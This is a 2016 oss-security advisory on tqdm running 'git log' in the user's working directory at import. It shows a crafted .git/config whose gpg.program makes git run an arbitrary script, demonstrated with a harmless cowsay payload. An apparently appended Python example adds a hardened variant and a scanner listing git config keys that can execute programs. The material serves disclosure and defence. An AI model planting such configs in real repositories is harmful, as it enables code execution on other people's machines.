Date: Sun, 25 Dec 2016 21:47:43 +0100
From: Jakub Wilk <jwilk@...lk.net>
To: oss-security@...ts.openwall.com
Subject: tqdm: insecure use of git

tqdm <https://github.com/tqdm/tqdm> is a "fast, extensible progress bar for 
Python".

When you import tqdm, the tqdm._version module executes the following command:

    git log -n 1 --oneline

This was meant to check if the user is running a pre-release version of tqdm.
But cwd might be a part of an unrelated git repository, possibly a malicious 
one. At least with git 2.10 or later, it's possible to craft a repo in which 
"git log" executes arbitrary code:

    $ tail -n4 /tmp/.git/config
    [log]
            showSignature = true
    [gpg]
            program = /tmp/moogpg

    $ tail -n4 /tmp/moogpg
    #!/bin/sh
    exec > /dev/tty 2>&1
    cowsay pwned
    sleep 9999

    $ cd /tmp

    $ pydoc tqdm
     _______
    < pwned >
     -------
            \   ^__^
             \  (oo)\_______
                (__)\       )\/\
                    ||----w |
                    ||     ||


Upstream bug report:
https://github.com/tqdm/tqdm/issues/328

Affected versions: v4.4.1 and later.

-- 
Jakub Wilk
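As an added example (not code from the report above, and not tqdm's own code), the following Python shows the cwd-dependent `git log` pattern the report describes next to a hardened variant that pins git to the package's own checkout and overrides the abused config keys from the command line, plus a small scanner that flags a `.git/config` like the crafted one above. All names here (`DANGEROUS_KEYS`, the functions, the sample config) are assumptions made for illustration; the key list is the editor's, with only `gpg.program` and `log.showSignature` taken from the report.

```python
"""Added example: vulnerable vs. hardened "git log" at import time, and a
.git/config scanner. Not from the report or from tqdm; names are assumed."""
import os
import subprocess
from typing import Dict, List, Optional

# Assumed list: config keys through which a plain "git log" (or the pager
# around it) ends up executing an external program. The pair from the report
# is gpg.program + log.showSignature. Stored lower-cased, as git matches them.
DANGEROUS_KEYS = {
    "gpg.program", "log.showsignature", "core.pager",
    "core.hookspath", "core.sshcommand",
}


def parse_git_config(text: str) -> Dict[str, str]:
    """Minimal parser for the INI-like .git/config syntax.

    Returns {"section.key": value} or {"section.subsection.key": value}.
    Section and key names are lower-cased (git is case-insensitive there);
    subsection names keep their case. No quoted values, continuation lines
    or include directives: just enough for the scanner below."""
    result: Dict[str, str] = {}
    section: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            body = line[1:-1].strip()
            if '"' in body:                      # e.g. [remote "origin"]
                name, _, sub = body.partition(" ")
                section = name.lower() + "." + sub.strip().strip('"')
            else:
                section = body.lower()
            continue
        if section is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        result[section + "." + key.strip().lower()] = value.strip()
    return result


def suspicious_keys(config_text: str) -> List[str]:
    """Keys a reviewer should flag before letting anything run git in that repo."""
    return sorted(k for k in parse_git_config(config_text) if k in DANGEROUS_KEYS)


def vulnerable_prerelease_check() -> Optional[str]:
    """The pattern from the report: git runs in whatever directory the importing
    process is in, so that directory's repository and its config are trusted."""
    try:
        out = subprocess.check_output(["git", "log", "-n", "1", "--oneline"],
                                      stderr=subprocess.DEVNULL)
    except (OSError, subprocess.CalledProcessError):
        return None
    return out.decode("utf-8", "replace").strip() or None


def hardened_git_argv(*args: str) -> List[str]:
    """git argv with the abused keys neutralised: -c settings take precedence
    over the repository's .git/config, and --no-pager removes core.pager."""
    return ["git", "--no-pager", "-c", "log.showSignature=false", *args]


def is_own_checkout(package_dir: str, toplevel: str) -> bool:
    """True only if the repository toplevel is the package's parent, i.e. the
    package is imported from its own source checkout, not from a directory
    that merely happens to sit inside someone else's repository."""
    return os.path.realpath(os.path.dirname(package_dir)) == os.path.realpath(toplevel)


def hardened_prerelease_check(package_dir: str) -> Optional[str]:
    """Run git from the package directory only, stop repository discovery
    above the expected checkout root, and refuse any other repository."""
    ceiling = os.path.dirname(os.path.dirname(package_dir))
    env = dict(os.environ, GIT_CEILING_DIRECTORIES=ceiling)
    try:
        top = subprocess.check_output(hardened_git_argv("rev-parse", "--show-toplevel"),
                                      cwd=package_dir, env=env, stderr=subprocess.DEVNULL)
        if not is_own_checkout(package_dir, top.decode("utf-8", "replace").strip()):
            return None
        out = subprocess.check_output(hardened_git_argv("log", "-n", "1", "--oneline"),
                                      cwd=package_dir, env=env, stderr=subprocess.DEVNULL)
    except (OSError, subprocess.CalledProcessError):
        return None
    return out.decode("utf-8", "replace").strip() or None


# Constructed sample: the crafted [log]/[gpg] sections from the report, with
# a remote section added to exercise subsection parsing.
CRAFTED_CONFIG = """\
[core]
        repositoryformatversion = 0
[remote "origin"]
        url = https://example.invalid/repo.git
[log]
        showSignature = true
[gpg]
        program = /tmp/moogpg
"""

if __name__ == "__main__":
    print("flagged keys:", suspicious_keys(CRAFTED_CONFIG))
    print("hardened argv:", hardened_git_argv("log", "-n", "1", "--oneline"))
    print("vulnerable check (cwd):", vulnerable_prerelease_check())
    here = os.path.dirname(os.path.abspath(__file__))
    print("hardened check (own dir):", hardened_prerelease_check(here))
```

The cleanest fix for a library is to not shell out to git at import time at all and to record the version at build time instead. If git must be consulted, the hardened variant removes the two things the report relies on: the importer's cwd no longer decides which repository is consulted (cwd is pinned to the package directory and `GIT_CEILING_DIRECTORIES` stops discovery above the expected checkout root), and the repository's own config can no longer switch on signature verification with an attacker-chosen `gpg.program`, because `-c log.showSignature=false` on the command line overrides it. The `is_own_checkout` test is what turns a developer checkout into the only repository that is ever trusted.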
